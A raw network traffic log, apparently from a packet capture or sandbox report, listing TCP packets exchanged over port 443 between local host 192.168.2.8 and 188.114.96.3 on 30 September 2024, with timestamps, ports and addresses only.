                                                                                                                                                                                                    Sep 30, 2024 18:25:30.317858934 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.317881107 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.318216085 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.318229914 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.318260908 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.318267107 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.318289042 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.318305969 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.401894093 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.401922941 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.402024031 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.402040958 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.402091980 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.402386904 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.402406931 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.402435064 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.402442932 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.402476072 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.402484894 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.402882099 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.402904034 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.402930975 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.402936935 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.402957916 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.402981043 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.403392076 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.403409958 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.403455019 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.403460979 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.403496981 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.403743029 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.403759003 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.403788090 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.403794050 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.403825045 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.403886080 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.404758930 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.404778957 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.404808998 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.404815912 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.404836893 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.404851913 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.405760050 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.405782938 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.405812025 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.405817986 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.405838013 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.405863047 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.406121016 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.406137943 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.406169891 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.406176090 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.406198025 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.406217098 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.490417957 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.490452051 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.490530014 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.490555048 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.490600109 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.490660906 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.490681887 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.490720987 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.490727901 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.490760088 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.491123915 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.491146088 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.491194963 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.491202116 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.491235018 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.491709948 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.491729975 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.491770029 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.491775990 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.491816044 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.492060900 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.492075920 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.492108107 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.492115021 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.492131948 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.492155075 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.492619038 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.492636919 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.492681980 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.492688894 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.492722034 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.494283915 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.494302034 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.494370937 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.494379997 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.494419098 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.494705915 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.494724035 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.494766951 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.494774103 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.494810104 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.578303099 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.578330040 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.578435898 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.578460932 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.578499079 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.578603029 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.578618050 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.578650951 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.578659058 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.578677893 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.578696012 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.579098940 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.579113960 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.579153061 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.579161882 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.579194069 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.579701900 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.579719067 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.579761028 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.579768896 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.579807043 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.580152035 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.580171108 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.580205917 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.580212116 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.580238104 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.580254078 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.580404997 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.580429077 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.580460072 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.580466032 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.580486059 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.580504894 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.581895113 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.581909895 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.581954956 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.581964970 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.581998110 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.582928896 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.582942963 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.582981110 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.582997084 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.583026886 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.666656971 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.666699886 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.666784048 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.666806936 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.666840076 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.666857958 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.667411089 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.667434931 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.667459965 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.667465925 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.667494059 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.667570114 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.667989016 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.668008089 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.668035030 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.668041945 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.668064117 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.668081999 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.668486118 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.668502092 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.668530941 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.668536901 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.668548107 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.668557882 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.668576002 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.668581009 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.668591022 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.668603897 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.668647051 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.670017958 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.670038939 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.670068026 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.670074940 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.670093060 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.670113087 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.670362949 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.670377970 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.670420885 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.670428038 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.670458078 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.670691013 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.753922939 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.753948927 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.754065990 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.754097939 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.754115105 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.754134893 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.754152060 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.754162073 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.754172087 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.754205942 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.754690886 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.754708052 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.754760027 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.754766941 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.754807949 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.755059958 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.755078077 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.755121946 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.755130053 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.755167961 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.755561113 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.755577087 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.755626917 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.755633116 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.755675077 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.755943060 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.755963087 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.755995989 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.756001949 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.756021023 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.756042957 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.757129908 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.757148027 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.757196903 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.757204056 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.757241964 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.758097887 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.758115053 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.758162022 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.758167982 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.758205891 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.841738939 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.841769934 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.841885090 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.841918945 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.841959000 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.842051983 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.842104912 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.842111111 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.842142105 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.842183113 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.850503922 CEST49706443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:30.850539923 CEST44349706188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.234647989 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.234709978 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.234772921 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.241955996 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.241987944 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.706728935 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.706789970 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.708324909 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.708336115 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.708622932 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.711673975 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.755394936 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.844955921 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.845004082 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.845033884 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.845047951 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.845061064 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.845072985 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.845089912 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.845114946 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.845145941 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.845158100 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.845417976 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.845444918 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.845453978 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.845464945 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.845491886 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.845496893 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.891081095 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.891109943 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.931446075 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.931488037 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.931504011 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.931514978 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.931526899 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.931550026 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.931572914 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.931597948 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.931606054 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.931619883 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.931653976 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.932619095 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.932667971 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.932693958 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.932698011 CEST49709443192.168.2.8188.114.96.3
